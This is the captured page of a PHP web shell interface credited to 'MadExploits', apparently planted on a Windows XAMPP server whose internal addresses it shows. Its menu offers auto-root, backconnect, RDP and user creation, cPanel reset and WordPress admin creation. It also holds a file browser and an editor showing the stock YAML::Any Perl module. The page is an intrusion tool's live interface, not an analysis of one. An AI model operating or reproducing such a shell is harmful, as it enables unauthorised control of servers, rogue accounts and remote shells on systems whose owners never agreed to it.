Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
YAML /
[ HOME SHELL ]
Name
Size
Permission
Action
Dumper
[ DIR ]
drwxrwxrwx
Loader
[ DIR ]
drwxrwxrwx
XS
[ DIR ]
drwxrwxrwx
Any.pm
2.6
KB
-rw-rw-rw-
Any.pod
2.82
KB
-rw-rw-rw-
Dumper.pm
16.69
KB
-rw-rw-rw-
Dumper.pod
776
B
-rw-rw-rw-
Error.pm
5.63
KB
-rw-rw-rw-
Error.pod
666
B
-rw-rw-rw-
LibYAML.pm
176
B
-rw-rw-rw-
LibYAML.pod
627
B
-rw-rw-rw-
Loader.pm
26.36
KB
-rw-rw-rw-
Loader.pod
767
B
-rw-rw-rw-
Marshall.pm
867
B
-rw-rw-rw-
Marshall.pod
656
B
-rw-rw-rw-
Mo.pm
3.24
KB
-rw-rw-rw-
Node.pm
4.32
KB
-rw-rw-rw-
Node.pod
2.48
KB
-rw-rw-rw-
Tag.pm
216
B
-rw-rw-rw-
Tag.pod
538
B
-rw-rw-rw-
Tiny.pm
41.6
KB
-rw-rw-rw-
Types.pm
6.44
KB
-rw-rw-rw-
Types.pod
738
B
-rw-rw-rw-
XS.pm
3.51
KB
-rw-rw-rw-
XS.pod
4.62
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Any.pm
use strict; use warnings; package YAML::Any; our $VERSION = '1.30'; use Exporter (); @YAML::Any::ISA = 'Exporter'; @YAML::Any::EXPORT = qw(Dump Load); @YAML::Any::EXPORT_OK = qw(DumpFile LoadFile); my @dump_options = qw( UseCode DumpCode SpecVersion Indent UseHeader UseVersion SortKeys AnchorPrefix UseBlock UseFold CompressSeries InlineSeries UseAliases Purity Stringify ); my @load_options = qw( UseCode LoadCode Preserve ); my @implementations = qw( YAML::XS YAML::Syck YAML::Old YAML YAML::Tiny ); sub import { __PACKAGE__->implementation; goto &Exporter::import; } sub Dump { no strict 'refs'; no warnings 'once'; my $implementation = __PACKAGE__->implementation; for my $option (@dump_options) { my $var = "$implementation\::$option"; my $value = $$var; local $$var; $$var = defined $value ? $value : ${"YAML::$option"}; } return &{"$implementation\::Dump"}(@_); } sub DumpFile { no strict 'refs'; no warnings 'once'; my $implementation = __PACKAGE__->implementation; for my $option (@dump_options) { my $var = "$implementation\::$option"; my $value = $$var; local $$var; $$var = defined $value ? $value : ${"YAML::$option"}; } return &{"$implementation\::DumpFile"}(@_); } sub Load { no strict 'refs'; no warnings 'once'; my $implementation = __PACKAGE__->implementation; for my $option (@load_options) { my $var = "$implementation\::$option"; my $value = $$var; local $$var; $$var = defined $value ? $value : ${"YAML::$option"}; } return &{"$implementation\::Load"}(@_); } sub LoadFile { no strict 'refs'; no warnings 'once'; my $implementation = __PACKAGE__->implementation; for my $option (@load_options) { my $var = "$implementation\::$option"; my $value = $$var; local $$var; $$var = defined $value ? $value : ${"YAML::$option"}; } return &{"$implementation\::LoadFile"}(@_); } sub order { return @YAML::Any::_TEST_ORDER if @YAML::Any::_TEST_ORDER; return @implementations; } sub implementation { my @order = __PACKAGE__->order; for my $module (@order) { my $path = $module; $path =~ s/::/\//g; $path .= '.pm'; return $module if exists $INC{$path}; eval "require $module; 1" and return $module; } croak("YAML::Any couldn't find any of these YAML implementations: @order"); } sub croak { require Carp; Carp::croak(@_); } 1;
Close